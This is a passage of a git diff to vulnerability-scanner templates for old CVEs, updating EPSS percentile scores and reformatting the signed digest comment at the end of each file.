b/http/cves/2002/CVE-2002-1131.yaml index 88dedc44fe..c14b436ac0 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2002-1131 cwe-id: CWE-80 epss-score: 0.06018 - epss-percentile: 0.92673 + epss-percentile: 0.92677 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3b02d68d2917135071bc01a9ba99c9ddcb27ff0742a2e348d13fe344f34c67a02204fe94628459b71d1ca2f5a590f8f8913b44463ced6e0cf5c720db6a364b52ee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c3b02d68d2917135071bc01a9ba99c9ddcb27ff0742a2e348d13fe344f34c67a02204fe94628459b71d1ca2f5a590f8f8913b44463ced6e0cf5c720db6a364b52ee8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index a5e7ecee1e..d2ad4f2cb5 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other epss-score: 0.02285 - epss-percentile: 0.88461 + epss-percentile: 0.88471 cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a7f657216035d8da309f2cf99222700a6e28e3ec17963598cf21861f8ca62e0c022100e16334f57d567db5905715da2032d3100fd640af08152cb3bac104cb2904c100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a7f657216035d8da309f2cf99222700a6e28e3ec17963598cf21861f8ca62e0c022100e16334f57d567db5905715da2032d3100fd640af08152cb3bac104cb2904c100:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index dd99f1c1c3..bbc451e523 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.0113 - epss-percentile: 0.83087 + epss-percentile: 0.83104 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100fab31ef19064b7e73257326013ba527e1669dcd27f004eaf1eecc68603ea0481022100b4169ea7307a1cd707e42d5bb30b7f663cab03ea65da616ce8fb3615b432b259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fab31ef19064b7e73257326013ba527e1669dcd27f004eaf1eecc68603ea0481022100b4169ea7307a1cd707e42d5bb30b7f663cab03ea65da616ce8fb3615b432b259:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index f5ff754ebd..d65bdce415 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2005-2428 cwe-id: CWE-200 epss-score: 0.01188 - epss-percentile: 0.8358 + epss-percentile: 0.83589 cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204279223234b723c912315857f205ec2bfc94665e93ae0bf0b69e2c892169ce69022100c52564f60051e1a332edd433b73d014b435c7250535a35fc94d9e15480bf035c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204279223234b723c912315857f205ec2bfc94665e93ae0bf0b69e2c892169ce69022100c52564f60051e1a332edd433b73d014b435c7250535a35fc94d9e15480bf035c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index dca1d2fb07..2f68bf0cd8 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2005-3344 cwe-id: NVD-CWE-Other epss-score: 0.02158 - epss-percentile: 0.88106 + epss-percentile: 0.88115 cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f938de24fd2fe86e88e38b23ecea7e116f03f627f1ddc481db5e9c2c2284fa3e022100aadb5898c7cd6b3ef4c158ac725420bdd4b9c28ecf67b9a03f6b84b9167a6114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f938de24fd2fe86e88e38b23ecea7e116f03f627f1ddc481db5e9c2c2284fa3e022100aadb5898c7cd6b3ef4c158ac725420bdd4b9c28ecf67b9a03f6b84b9167a6114:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index d2388a557a..b80e346dbb 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 - epss-percentile: 0.8958 + epss-percentile: 0.89589 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100ff7e44f75cc3eda99f9a22ca69ddd932dc8068be11d2836d11f8ca7fb3e08d11022016dc283be28a1f332d3878c92bd99f78d06e4f3c61ed12b66fa957aa787128ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ff7e44f75cc3eda99f9a22ca69ddd932dc8068be11d2836d11f8ca7fb3e08d11022016dc283be28a1f332d3878c92bd99f78d06e4f3c61ed12b66fa957aa787128ac:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index d3e7499edc..f45541639d 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2005-4385 cwe-id: NVD-CWE-Other epss-score: 0.00294 - epss-percentile: 0.6585 + epss-percentile: 0.65867 cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a55474cc315ff2c17cb85e509872b15117b28874099f76108bcb2f54394eddbc022100d75c6f9105e255078ba45869314c15bfea4de196ee497d9fe04137a296e7df2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a55474cc315ff2c17cb85e509872b15117b28874099f76108bcb2f54394eddbc022100d75c6f9105e255078ba45869314c15bfea4de196ee497d9fe04137a296e7df2b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 05a7c6511b..56de611307 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other epss-score: 0.01015 - epss-percentile: 0.82109 + epss-percentile: 0.82128 cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ddf70fdd0495178198448e41820fd005863c4a7aff01ee0c9c4e6b50eb1c184802200a85234f513d21a1999a3311e5565af22001d57e097e84f8b1cbf8ac60b97706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ddf70fdd0495178198448e41820fd005863c4a7aff01ee0c9c4e6b50eb1c184802200a85234f513d21a1999a3311e5565af22001d57e097e84f8b1cbf8ac60b97706:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index f407603eed..890743261c 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2006-2842 cwe-id: CWE-22 epss-score: 0.22361 - epss-percentile: 0.95952 + epss-percentile: 0.95956 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008795addc875c82429bbeeb12cbf1b6a901732df7d3b8acf07f192152a84a06d702207fc23a3301d4058c1d2904fc91fa408ac10f2795c977531601928f1d7a9dde55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008795addc875c82429bbeeb12cbf1b6a901732df7d3b8acf07f192152a84a06d702207fc23a3301d4058c1d2904fc91fa408ac10f2795c977531601928f1d7a9dde55:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 0d27ecde8b..fe13a0dcbb 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other epss-score: 0.0059 - epss-percentile: 0.75909 + epss-percentile: 0.75921 cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ad2673ae3433641fe8548bfdbd9e6e67d97fcaf76f009dcc22c02144546693d7022100c986859a160758c79d8e9b3ded05a35828626d1e87e3211d502751415253d8b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ad2673ae3433641fe8548bfdbd9e6e67d97fcaf76f009dcc22c02144546693d7022100c986859a160758c79d8e9b3ded05a35828626d1e87e3211d502751415253d8b1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 7ae310f247..43bc6f43fe 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2007-4504 cwe-id: CWE-22 epss-score: 0.01677 - epss-percentile: 0.86285 + epss-percentile: 0.86294 cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022049a21ff15edbdbed1136eda1e39399c38d0429a1e0093537ec2928e354a6f2a4022100b49af163f3441f00812b294d846f761248a2dfcff7ccd636dd46339c676b0c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022049a21ff15edbdbed1136eda1e39399c38d0429a1e0093537ec2928e354a6f2a4022100b49af163f3441f00812b294d846f761248a2dfcff7ccd636dd46339c676b0c2e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 79bc347c00..827c8be695 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other epss-score: 0.19583 - epss-percentile: 0.95735 + epss-percentile: 0.95737 cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -49,4 +49,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ff36a8c5380667bdf113578f727da39f025cb5158c7781164bd9385190484794022048af52900ca68a30d4aa37c36c911970cb3a5cd6f1f3f2a716b86bbaad6c5a29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ff36a8c5380667bdf113578f727da39f025cb5158c7781164bd9385190484794022048af52900ca68a30d4aa37c36c911970cb3a5cd6f1f3f2a716b86bbaad6c5a29:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 245eff365b..770a63f68f 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2007-5728 cwe-id: CWE-79 epss-score: 0.02361 - epss-percentile: 0.8863 + epss-percentile: 0.88639 cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d3ccd5fa20f128c5ba8515a03fb27b12836db7f49ac6d5ef26edcc1884a4591302201795657f021790fc2b3380eb1c0b7776dfbaf9db7f03c233218d7b1668134a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d3ccd5fa20f128c5ba8515a03fb27b12836db7f49ac6d5ef26edcc1884a4591302201795657f021790fc2b3380eb1c0b7776dfbaf9db7f03c233218d7b1668134a7e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 155b5c882b..b75372aa42 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-1059 cwe-id: CWE-94 epss-score: 0.01493 - epss-percentile: 0.85423 + epss-percentile: 0.85435 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7a2d8e1e560064d3e09e2a6b0bca20c1173fc1077847c259e8340fe402992c8022100a3768d81a5c9ac752f713695da6f875854c17e34acf2fad7399c83046d0ce29c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f7a2d8e1e560064d3e09e2a6b0bca20c1173fc1077847c259e8340fe402992c8022100a3768d81a5c9ac752f713695da6f875854c17e34acf2fad7399c83046d0ce29c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 0482ae2d89..475ec7d4f2 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-1061 cwe-id: CWE-79 epss-score: 0.00938 - epss-percentile: 0.81358 + epss-percentile: 0.81368 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200618f271438cd6973744c36db3570f773c3dc326dd9ee5a3efc9de8d888a5f8d0220046753c7fc24a23d79eb17729ab7ef93fcbb50b8ae1d9d4e1e3329616bb8fa80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200618f271438cd6973744c36db3570f773c3dc326dd9ee5a3efc9de8d888a5f8d0220046753c7fc24a23d79eb17729ab7ef93fcbb50b8ae1d9d4e1e3329616bb8fa80:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 8b96c576f1..8f4fd009a7 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.3 cve-id: CVE-2008-1547 cwe-id: CWE-601 - epss-score: 0.03523 - epss-percentile: 0.90505 + epss-score: 0.02834 + epss-percentile: 0.89575 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* metadata: max-request: 2 @@ -40,4 +40,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402206d2e38bf3a764c11102c50c4663f51ad4326f3d91dca6a2dafa427b6a555c83502206ff47ec4336887ea3300855e788c6e0bbea4627bd2a7ab9718791becfe7a35ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206d2e38bf3a764c11102c50c4663f51ad4326f3d91dca6a2dafa427b6a555c83502206ff47ec4336887ea3300855e788c6e0bbea4627bd2a7ab9718791becfe7a35ff:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index bfd3fce180..0ffffaa421 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-2398 cwe-id: CWE-79 epss-score: 0.00329 - epss-percentile: 0.67792 + epss-percentile: 0.67809 cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022038fd4b05a7858613471b66549327422cef6fb4a801d57847f2a6ab6b1c53760a022041098c431a8476e260f29d71be0f1f59b036e910ddb633c3ea97183df92aac44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022038fd4b05a7858613471b66549327422cef6fb4a801d57847f2a6ab6b1c53760a022041098c431a8476e260f29d71be0f1f59b036e910ddb633c3ea97183df92aac44:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index f95b9122e8..58455d2caa 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-2650 cwe-id: CWE-22 epss-score: 0.06344 - epss-percentile: 0.9286 + epss-percentile: 0.92864 cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022026f15d9f2dde4ce6b7296bcf50011ca21c95cf40fa54ad46ec30d8dfe2814a72022075c164c613e8f7c3503fbe248e12a322322c86c585fde644d39c6ee240a0b368:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022026f15d9f2dde4ce6b7296bcf50011ca21c95cf40fa54ad46ec30d8dfe2814a72022075c164c613e8f7c3503fbe248e12a322322c86c585fde644d39c6ee240a0b368:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 90dbe60c32..3a5fa877c9 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2008-4668 cwe-id: CWE-22 epss-score: 0.01018 - epss-percentile: 0.8213 + epss-percentile: 0.82149 cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bd437431438ab0778f58d96e501c57a939173ea1b7a4bf4b58a5829dea73092f02210093986e9daa01c1646d737d4a2c3ab7a0b969a66d7678585ea0e20b873a7098db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bd437431438ab0778f58d96e501c57a939173ea1b7a4bf4b58a5829dea73092f02210093986e9daa01c1646d737d4a2c3ab7a0b969a66d7678585ea0e20b873a7098db:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index df3911d52f..5a69f82c31 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-4764 cwe-id: CWE-22 epss-score: 0.02365 - epss-percentile: 0.88638 + epss-percentile: 0.88647 cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d56235575e3edf95da01e6ad8946a9e0921bbeb1337f551d4d15ad9722270f5f022067165549b20553152082c5511390043f15ac52c74d83b3c45d608321eaaabee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d56235575e3edf95da01e6ad8946a9e0921bbeb1337f551d4d15ad9722270f5f022067165549b20553152082c5511390043f15ac52c74d83b3c45d608321eaaabee3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index d02640ac6d..613edf790a 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 - epss-percentile: 0.88557 + epss-percentile: 0.88565 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205c2c04b2c9bcadc7c5cceaf12da8461e5e6390a99f5f5be6028d376c20b8e0d002203f467c3d5aece1c6308a8bbd56577bc42f25bf9d84b0dea84e77f26c328a1a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205c2c04b2c9bcadc7c5cceaf12da8461e5e6390a99f5f5be6028d376c20b8e0d002203f467c3d5aece1c6308a8bbd56577bc42f25bf9d84b0dea84e77f26c328a1a07:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index b7f7300bb6..dc2840da9f 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-6080 cwe-id: CWE-22 epss-score: 0.00824 - epss-percentile: 0.80042 + epss-percentile: 0.80049 cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205f975239edad42a53e6c5d35953faaf4224c0ce71abced8c6504183fdeae3db7022100df936529327fbe3214debdf9cf85815b3d486c54ed2b5d3f1b02adf9c640be15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205f975239edad42a53e6c5d35953faaf4224c0ce71abced8c6504183fdeae3db7022100df936529327fbe3214debdf9cf85815b3d486c54ed2b5d3f1b02adf9c640be15:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 2b8f76c3c9..703a22f1b8 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-6172 cwe-id: CWE-22 epss-score: 0.00509 - epss-percentile: 0.7395 + epss-percentile: 0.73965 cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220460e24c725bd65a8ae81b3d0e7bff5b11d811cfa21ba58072c7a4b8368f75c72022100f9c8c76022cba1fbaf95c8bcd634d8e9569d7099722d11a56f688ca65ccede8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220460e24c725bd65a8ae81b3d0e7bff5b11d811cfa21ba58072c7a4b8368f75c72022100f9c8c76022cba1fbaf95c8bcd634d8e9569d7099722d11a56f688ca65ccede8a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 076e58e2a9..850c6d0ff7 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-6222 cwe-id: CWE-22 epss-score: 0.01029 - epss-percentile: 0.82206 + epss-percentile: 0.82225 cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210090a7a42aa6292140acc89b2a57f91f31e71311d42036ac9c2a34c1281ea20a680220171328b0e8cad698524fc03962dcc25c94ce8bf1f7bd8b023615bd14ba102ce7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210090a7a42aa6292140acc89b2a57f91f31e71311d42036ac9c2a34c1281ea20a680220171328b0e8cad698524fc03962dcc25c94ce8bf1f7bd8b023615bd14ba102ce7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 8dac39b9a9..391cd558b5 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-6465 cwe-id: CWE-79 epss-score: 0.00421 - epss-percentile: 0.71413 + epss-percentile: 0.71429 cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d7d299017424e2049991bfe32fdc3f66f819de433cf4a7fafd88be40a8cf5bd4022006b62bd407a018bf0eb1b8e64c44aa8496cfbd6bdf512a183a1113cd98f56455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d7d299017424e2049991bfe32fdc3f66f819de433cf4a7fafd88be40a8cf5bd4022006b62bd407a018bf0eb1b8e64c44aa8496cfbd6bdf512a183a1113cd98f56455:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 5f4bf614af..2ab1775e47 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 - epss-percentile: 0.69107 + epss-percentile: 0.69124 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202e5b69b2ac267f882e9adc776eb41b70e07b722ed988fc5dc1f26dd9d0052391022034fbfa23e6eef6082f057ac923e8b31ff48fa6f46ea322164677dbba789e0a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202e5b69b2ac267f882e9adc776eb41b70e07b722ed988fc5dc1f26dd9d0052391022034fbfa23e6eef6082f057ac923e8b31ff48fa6f46ea322164677dbba789e0a7e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 6befdf9eef..9175c7f94e 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.0038 - epss-percentile: 0.6998 + epss-percentile: 0.69999 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: verified: true @@ -48,4 +48,5 @@ http: - type: status status: - 500 -# digest: 490a0046304402204b44b8ca195f9a8bb197c150d0a2191096831ffd5caa2d6931bcdfc03a24d92502201f64705581283da93992165cc9106158e5b090dc3a5dc0eb5443d475a8a26650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204b44b8ca195f9a8bb197c150d0a2191096831ffd5caa2d6931bcdfc03a24d92502201f64705581283da93992165cc9106158e5b090dc3a5dc0eb5443d475a8a26650:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 757c707a50..bb596a0029 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-7269 cwe-id: CWE-20 epss-score: 0.01358 - epss-percentile: 0.84754 + epss-percentile: 0.84762 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -37,4 +37,5 @@ http: part: header 